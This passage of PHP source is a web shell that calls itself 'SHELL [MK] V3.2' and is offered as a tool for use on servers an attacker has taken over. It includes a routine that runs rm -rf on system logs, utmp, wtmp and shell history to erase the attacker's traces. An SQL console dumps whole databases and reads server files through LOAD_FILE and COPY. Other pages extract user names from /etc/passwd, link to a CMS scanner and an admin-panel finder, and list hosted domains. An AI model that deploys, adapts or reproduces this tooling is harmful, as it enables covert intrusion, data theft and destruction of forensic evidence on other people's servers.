  463. passthru("rm -rf /usr/local/apache/log");
  464. passthru("rm -rf /var/apache/logs");
  465. passthru("rm -rf /var/apache/log");
  466. passthru("rm -rf /var/run/utmp");
  467. passthru("rm -rf /var/logs");
  468. passthru("rm -rf /var/log");
  469. passthru("rm -rf /var/adm");
  470. passthru("rm -rf /etc/wtmp");
  471. passthru("rm -rf /etc/utmp");
  472. passthru("rm -rf $HISTFILE");
  473. passthru("rm -rf /var/log/lastlog");
  474. passthru("rm -rf /var/log/wtmp");
  475. echo "<table align='center' width='50%'>";
  476. //LET THE MOTHER OF FUNCTIONS TO COMPLETE THE TASK
  477. sleep(1);
  478. echo '</span><br><span style="color:#FFFFFF"><center>GOOD LOCK ! YOUR TRACES HAS BEEN ECRASED FROM THE SERVER </span></center>';
  479. echo '<center><br><a href="?Mister=DELLOGS" style="border-top: 3px solid #0000F0; font-size:10px;font-family: "Aldrich", Tahoma, sans-serif;text-align: center;color: #FFFFFF; font-size:10px;border: 0;background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;padding:0 10px;margin:0 auto;height:25px;border-bottom:5px solid #FFFFFF;border-bottom:4px solid #0000F0;"> CLEANNER LOGS </a></center>';
  480. //////// MY RIGHT
  481. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|' ;
  482. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  483. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  484. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  485. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  486. $SPAN2 = "<span style='color:#FFFFFF;'>";
  487. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  488. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  489. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  490. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  491. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  492. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  493. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  494. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  495. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  496. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  497. echo ''. $REPORTERROR .'</a></span></footer>'; echo ''. $THEEND .'' ;
  498. exit ; }
  499. ///// DETECT LOGS
  500.  
  501. if ($_GET['Mister'] == 'SQLConnect') {
  502. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0;'>SQLConnect</span></nav><center>";
  503. echo "<br>";
  504. echo "<script>     var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';     var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';     var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';     var d = document;    function set(a,c,p1,p2,p3,charset) {        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;         if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;         if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;   }   function g(a,c,p1,p2,p3,charset) {      set(a,c,p1,p2,p3,charset);      d.mf.submit();  }  </script>";  
  505. class DbClass {        
  506. var $type;     
  507. var $link;     
  508. var $res;function DbClass($type)    {          
  509. $this->type = $type;        }      
  510. function connect($host, $user, $pass, $dbname){            
  511. switch($this->type) {              
  512. case 'mysql':                  
  513. if( $this->link = @mysql_connect($host,$user,$pass,true) )
  514. return true;                   
  515. break;             
  516. case 'pgsql':                  
  517. $host = explode(':', $host);                   
  518. if(!$host[1]) $host[1]=5432;                   
  519. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") )
  520. return true;                   
  521. break;}            
  522. return false;}     
  523. function selectdb($db) {           
  524. switch($this->type) {              
  525. case 'mysql':                  
  526. if (@mysql_select_db($db))
  527. return true;                   
  528. break;          }          
  529. return false;       }      
  530. function query($str) {         
  531. switch($this->type) {              
  532. case 'mysql':                  
  533. return $this->res = @mysql_query($str);                    
  534. break;             
  535. case 'pgsql':                  
  536. return $this->res = @pg_query($this->link,$str);                   
  537. break; }           
  538. return false;}     
  539. function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;          
  540. switch($this->type) {              
  541. case 'mysql':                  
  542. return @mysql_fetch_assoc($res);                   
  543. break;             
  544. case 'pgsql':                  
  545. return @pg_fetch_assoc($res);                  
  546. break;          }          
  547. return false;       }      
  548. function listDbs() {           
  549. switch($this->type) {              
  550. case 'mysql':                        
  551. return $this->query("SHOW databases");             
  552. break;             
  553. case 'pgsql':                  
  554. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");              
  555. break;  }          
  556. return false;       }      
  557. function listTables() {            
  558. switch($this->type) {              
  559. case 'mysql':                  
  560. return $this->res = $this->query('SHOW TABLES');               
  561. break;             
  562. case 'pgsql':                  
  563. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");              
  564. break;          }          
  565. return false;       }      
  566. function error() {         
  567. switch($this->type) {              
  568. case 'mysql':                  
  569. return @mysql_error();             
  570. break;             
  571. case 'pgsql':                  
  572. return @pg_last_error();               
  573. break;          }          
  574. return false;       }      
  575. function setCharset($str) {            
  576. switch($this->type) {              
  577. case 'mysql':                  
  578. if(function_exists('mysql_set_charset'))                       
  579. return @mysql_set_charset($str, $this->link);                  
  580. else $this->query('SET CHARSET '.$str);                    
  581. break;             
  582. case 'pgsql':                  
  583. return @pg_set_client_encoding($this->link, $str);                 
  584. break;          }          
  585. return false;       }      
  586. function loadFile($str) {          
  587. switch($this->type) {              
  588. case 'mysql':                  
  589. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));             
  590. break;             
  591. case 'pgsql':                  
  592. $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");                 
  593. $r=array();                    
  594. while($i=$this->fetch())                       
  595. $r[] = $i['file'];                 
  596. $this->query('drop table wso2');                   
  597. return array('file'=>implode("\n",$r));                
  598. break;          }          
  599. return false;       }      
  600. function dump($table, $fp = false) {           
  601. switch($this->type) {              
  602. case 'mysql':                  
  603. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');                 
  604. $create = mysql_fetch_array($res);                 
  605. $sql = $create[1].";\n";                    
  606. if($fp) fwrite($fp, $sql); else
  607. echo($sql);                    
  608. $this->query('SELECT * FROM `'.$table.'`');                    
  609. $head = true;                  
  610. while($item = $this->fetch()) {                        
  611. $columns = array();                        
  612. foreach($item as $k=>$v) {                            
  613. if($v == null)                                
  614. $item[$k] = "NULL";                            
  615. elseif(is_numeric($v))                                
  616. $item[$k] = $v; else                                
  617. $item[$k] = "'".@mysql_real_escape_string($v)."'";                         
  618. $columns[] = "`".$k."`";                        }                        
  619. if($head) {                            
  620. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';                            
  621. $head = false;                         }
  622. else                            
  623. $sql = "\n\t,(".implode(", ", $item).')';                        
  624. if($fp) fwrite($fp, $sql); else echo($sql);                     }                    
  625. if(!$head)                        
  626. if($fp) fwrite($fp, ";\n\n");
  627. else
  628. echo(";\n\n");             
  629. break;             
  630. case 'pgsql':                  
  631. $this->query('SELECT * FROM '.$table);                 
  632. while($item = $this->fetch()) {                        
  633. $columns = array();                        
  634. foreach($item as $k=>$v) {                         
  635. $item[$k] = "'".addslashes($v)."'";                             $columns[] = $k;                        }                        
  636. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";                        
  637. if($fp) fwrite($fp, $sql); else echo($sql);                     }              
  638. break;          }          
  639. return false;       }   };  
  640. $db = new DbClass($_POST['type']);  
  641. if(@$_POST['p2']=='download') {        
  642. $db->connect($_POST['sql_host'],
  643. $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);      
  644. $db->selectdb($_POST['sql_base']);        
  645. switch($_POST['charset']) {            
  646. case "Windows-1251": $db->setCharset('cp1251');
  647. break;            
  648. case "UTF-8": $db->setCharset('utf8');
  649. break;            
  650. case "KOI8-R": $db->setCharset('koi8r');
  651. break;            
  652. case "KOI8-U": $db->setCharset('koi8u');
  653. break;            
  654. case "cp866": $db->setCharset('cp866');
  655. break;         }        
  656. if(empty($_POST['file'])) {             ob_start("ob_gzhandler", 4096);             header("Content-Disposition: attachment; filename=dump.sql");             header("Content-Type: text/plain");            
  657. foreach($_POST['tbl'] as $v)               
  658. $db->dump($v);            
  659. exit; } elseif($fp = @fopen($_POST['file'], 'w')) {            
  660. foreach($_POST['tbl'] as $v)                
  661. $db->dump($v, $fp);            
  662. fclose($fp);            
  663. unset($_POST['p2']); } else            
  664. die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');   }  
  665. echo " <div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' ";    
  666. if(@$_POST['type']=='mysql')
  667. echo 'selected';
  668. echo ">MySql</option><option value='pgsql' ";
  669. if(@$_POST['type']=='pgsql')
  670. echo 'selected';
  671. echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td> <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td> <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";     $tmp = "<input type=text name=sql_base value=''>";  
  672. if(isset($_POST['sql_host'])){     
  673. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {            
  674. switch($_POST['charset']) {                
  675. case "Windows-1251": $db->setCharset('cp1251');
  676. break;             
  677. case "UTF-8": $db->setCharset('utf8');
  678. break;             
  679. case "KOI8-R": $db->setCharset('koi8r');
  680. break;             
  681. case "KOI8-U": $db->setCharset('koi8u');
  682. break;             
  683. case "cp866": $db->setCharset('cp866');
  684. break;          }           $db->listDbs();            
  685. echo "<select name=sql_base><option value=''></option>";           
  686. while($item = $db->fetch()) {              
  687. list($key, $value) = each($item);              
  688. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';           }          
  689. echo '</select>';       }      
  690. else
  691. echo $tmp;  }
  692. else       
  693. echo $tmp;  
  694. echo "</td><td><input type=submit class=Mister-button value='Done' onclick='fs(d.sf);'></td>                 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' CHECKED') . "> count the number of rows</td>            </tr></table><script>             s_db='".@addslashes($_POST['sql_base'])."';             function fs(f) {                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};                     if(f.p1) f.p1.value='';                     if(f.p2) f.p2.value='';                     if(f.p3) f.p3.value='';                 }             }             function st(t,l) {              d.sf.p1.value = 'select';               d.sf.p2.value = t;                 if(l && d.sf.p3) d.sf.p3.value = l;              d.sf.submit();          }           function is() {                 for(i=0;i<d.sf.elements['tbl[]'].length;++i)                    d.sf.elements['tbl[]'][i].CHECKED = !d.sf.elements['tbl[]'][i].CHECKED;             }       </script>";    
  695. if(isset($db) && $db->link){       
  696. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";            
  697. if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);             
  698. echo "<tr><td width=1 style='border-top:1px solid #666;'><span>Tables:</span><br><br>";                
  699. $tbls_res = $db->listTables();             
  700. while($item = $db->fetch($tbls_res)) {                 
  701. list($key, $value) = each($item);                    
  702. if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value);                    
  703. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";                }              
  704. echo "<input type='checkbox' onclick='is();'> <input type=button class=Mister-button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:1px solid #666;'>";               
  705. if(@$_POST['p1'] == 'select') {                    
  706. $_POST['p1'] = 'query';                    
  707. $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
  708. $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);                   
  709. $num = $db->fetch();$pages = ceil($num['n'] / 30);
  710. echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";                    
  711. echo " of $pages";                    
  712. if($_POST['p3'] > 1)                        
  713. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";                    
  714. if($_POST['p3'] < $pages)                        
  715. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";                    
  716. $_POST['p3']--;
  717. if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);                    
  718. else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';                 
  719. echo "<br><br>";                }              
  720. if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {                   
  721. $db->query(@$_POST['p2']);                 
  722. if($db->res !== false) {                       
  723. $title = false;                        
  724. echo '<table width=100% cellspacing=1 cellpadding=0 class=main >';                     
  725. $line = 1;                     
  726. while($item = $db->fetch()) {                          
  727. if(!$title) {                              
  728. echo '<tr>';                               
  729. foreach($item as $key => $value)                                   
  730. echo '<th>'.$key.'</th>';                               reset($item);                              
  731. $title=true;                               
  732. echo '</tr><tr>';                              
  733. $line = 2;                          }                          
  734. echo '<tr class="l'.$line.'">';                            
  735. $line = $line==1?2:1;                          
  736. foreach($item as $key => $value) {                             
  737. if($value == null)                                 
  738. echo '<td><i>null</i></td>';                               
  739. else                                   
  740. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';                            }                          
  741. echo '</tr>'; }                        
  742. echo '</table>'; }
  743. else {                     
  744. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';                     }               }              
  745. echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";                
  746. if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))                    
  747. echo htmlspecialchars($_POST['p2']);                
  748. echo "</textarea><br/><input type=submit class=Mister-button value='EXECUTE'>";                
  749. echo "</td></tr>";          }          
  750. echo "</table></form><br/>";            
  751. if($_POST['type']=='mysql') {                
  752. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");                
  753. if($db->fetch())                    
  754. echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit class =Mister-button value='Done'></form>";   }         
  755. if(@$_POST['p1'] == 'loadfile') {              
  756. $file = $db->loadFile($_POST['p2']);               
  757. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';            }   }
  758.  else {        
  759. echo htmlspecialchars($db->error());     }  
  760. echo '<br><br>';
  761. ///// FOOTER
  762. $FOTTER2 = "<footer class='MK-footer'>";  
  763. echo ''. $FOTTER2 .'' ;
  764. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  765. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  766. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  767. $SERVERIP1 = "SERVER IP :";
  768. echo ''. $SERVERIP1 .'' ;
  769. $SPAN2 = "<span style='color:#FFFFFF;'>";
  770. $SPAN3 = "</span>";
  771. echo ''. $SPAN2 .'' ;
  772. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  773. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  774. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  775. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  776. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  777. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  778. $HOSTOWNED1 = "HOST OWNED :";
  779. echo ''. $HOSTOWNED1 .'' ;
  780. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  781. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  782. echo ''. $REPORTERROR .'</a></span></footer>';
  783. echo ''. $THEEND .'' ;
  784. exit;
  785. }
  786. ///////// EXTRACT
  787. if ($_GET["Mister"] == "EtcExtract"){
  788. ///// FOOTER
  789. $FOTTER2 = "<footer class='MK-footer'>";  
  790. echo ''. $FOTTER2 .'' ;
  791. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  792. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  793. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  794. $SERVERIP1 = "SERVER IP :";
  795. echo ''. $SERVERIP1 .'' ;
  796. $SPAN2 = "<span style='color:#FFFFFF;'>";
  797. $SPAN3 = "</span>";
  798. echo ''. $SPAN2 .'' ;
  799. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  800. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  801. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  802. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  803. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  804. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  805. $HOSTOWNED1 = "HOST OWNED :";
  806. echo ''. $HOSTOWNED1 .'' ;
  807. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  808.  
  809. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  810. echo ''. $REPORTERROR .'</a></span></footer>';
  811. echo ''. $THEEND .'' ;
  812. echo "<br><center><nav class='social'><ul>
  813. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  814. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  815. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  816. </ul></nav></center>";
  817. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0'>EXTRACT USERS FROM /ETC/PASSWD </span></nav><br><div class=content><center>";
  818.  echo '<form action="" method="POST"><textarea rows="20" cols="20" name="fpasswd" style="width:50%;"></textarea></br>
  819. <br><input type="submit" value="Go..!" class="Mister-button"></br></br>';
  820. if(isset($_POST['fpasswd'])){
  821.   foreach(explode("\n",$_POST['fpasswd']) as $user){
  822.   $user = trim($user);
  823.   $user = explode(":", $user);
  824.   echo $user[0]."</br></form>";
  825. }
  826. }
  827. exit;
  828. }
  829. /////// ABOUT
  830. if ($_GET['Mister'] == 'Abouts') {
  831. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>ABOUT</span><center></nav>";
  832. echo "<br><div class=content><center><img src='http://gulf-up.com/do.php?img=9366' height='150'></center><br>";
  833. echo "<center><span style='font-size:20px;color:white'>SHELL [MK] V3.2</a></span></center>
  834. <br>
  835. <center><marquee direction='up' scrollamount='1' bgcolor='' width='400' height='50'><center>
  836. <center><span style='color:white'>CREATED BY MISTER KLIO</span><center>
  837. <center><span style='color:#0000F0;font-size:10px;'>YOUTUBER , KILLER HTML5, JAVASCRIPT, CSS , JS , ADOBE PHOTOSHOP <br> LOGICIEL, MATERIEL INFORMATIQUE ET PROGRAMMATION INFORMATIQUE</span><center>
  838. <br><center><span style='color:white'>MADE IN MOROCCO</span><center>
  839. <center><span style='color:#0000F0;font-size:10px;'> GREETZ TO : ALL MEMBERS OF CODERSLEET & CODERSARMY TEAM</span><center><br>
  840. <center><span style='color:white'>ABOUT SH3LL [MK]</span><center>
  841. <center><span style='color:#0000F0;font-size:10px;'>HACK IS NOT A CRIME , HACK JUSTE FOR TESTING THE SECURITY OF SERVER .</span></center>
  842. <center><span style='color:#0000F0;font-size:10px;'>AND TO READ THE ERUR OF THE STUPID PROGRAMMING .</span></center>
  843. <center><span style='color:#0000F0;font-size:10px;'>FOR UPDATE AND TO DEVLOP THE WEBSITE </span></center>
  844. <center><span style='color:#0000F0;font-size:10px;'>SH3LL MKV3 IS RESPONSIBLE JUSTE FOR TESTING THE SECURITY OF SERVER</span></center>
  845. <center><span style='color:#0000F0;font-size:10px;'>WE ARE THE NEW GENARATION , SH3LL MK FOR ME FOR YOU </span></center></marquee></center><br>
  846. <center><span style='color:white'>UPDATE UR VERSION 3.2 , REPPOT ERROR\n</span><center>
  847. <a target=\"_GET\" href=http://facebook.com/IzzAdiine>
  848. <span style='color:#0000F0;'>CONTACT</a><br><br><br><br><br>
  849. ";
  850. ///// FOOTER
  851. $FOTTER2 = "<footer class='MK-footer'>";  
  852. echo ''. $FOTTER2 .'' ;
  853. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  854. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  855. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  856. $SERVERIP1 = "SERVER IP :";
  857. echo ''. $SERVERIP1 .'' ;
  858. $SPAN2 = "<span style='color:#FFFFFF;'>";
  859. $SPAN3 = "</span>";
  860. echo ''. $SPAN2 .'' ;
  861. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  862. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  863. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  864. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  865. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  866. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  867. $HOSTOWNED1 = "HOST OWNED :";
  868. echo ''. $HOSTOWNED1 .'' ;
  869. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  870. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  871. echo ''. $REPORTERROR .'</a></span></footer>';
  872. echo ''. $THEEND .'' ;
  873. exit;
  874. }
  875. ////// KILLING SHELL
  876. if ($_GET['Mister'] == 'Killing') {
  877.     $IMGLOGO = '<div class=content><img src="http://gulf-up.com/do.php?img=9366" height="150">';
  878. echo "<br><center>"; echo ''. $IMGLOGO .'</center><br>';
  879. echo '<center><span style="font-size:10px;  color:#0000F0">U REALLY WANT TO REMOVE SHELL ?</span></center>';
  880. echo '<center><br><b><a href="?Mister=kil"><span style="color:#ff0000;" >YES</span></a> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  881. <a style="color:white;" href="?Mister=MKV"><span>NO</span></a></b></center><br>
  882. ';
  883. ///// FOOTER
  884. $FOTTER2 = "<footer class='MK-footer'>";  
  885. echo ''. $FOTTER2 .'' ;
  886. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  887. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  888. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  889. $SERVERIP1 = "SERVER IP :";
  890. echo ''. $SERVERIP1 .'' ;
  891. $SPAN2 = "<span style='color:#FFFFFF;'>";
  892. $SPAN3 = "</span>";
  893. echo ''. $SPAN2 .'' ;
  894. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  895. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  896. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  897. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  898. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  899. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  900. $HOSTOWNED1 = "HOST OWNED :";
  901. echo ''. $HOSTOWNED1 .'' ;
  902. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  903. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  904. echo ''. $REPORTERROR .'</a></span></footer>';
  905. echo ''. $THEEND .'' ;
  906. exit;
  907. }
  908. /////////// GET DOMAINS
  909. if(isset($_GET['Mister']) && ($_GET['Mister'] == 'Domains')) {
  910. $FOTTER2 = "<footer class='MK-footer'>";  
  911. echo ''. $FOTTER2 .'' ;
  912. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  913. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  914. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  915. $SERVERIP1 = "SERVER IP :";
  916. echo ''. $SERVERIP1 .'' ;
  917. $SPAN2 = "<span style='color:#FFFFFF;'>";
  918. $SPAN3 = "</span>";
  919. echo ''. $SPAN2 .'' ;
  920. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  921. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  922. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  923. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  924. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  925. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  926. $HOSTOWNED1 = "HOST OWNED :";
  927. echo ''. $HOSTOWNED1 .'' ;
  928. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  929. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  930. echo ''. $REPORTERROR .'</a></span></footer>';
  931. echo ''. $THEEND .'' ;
  932. echo "<br><center><nav class='social'><ul>
  933. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  934. <li><a href='?Mister=Domains'>Get All Domains</a></li>
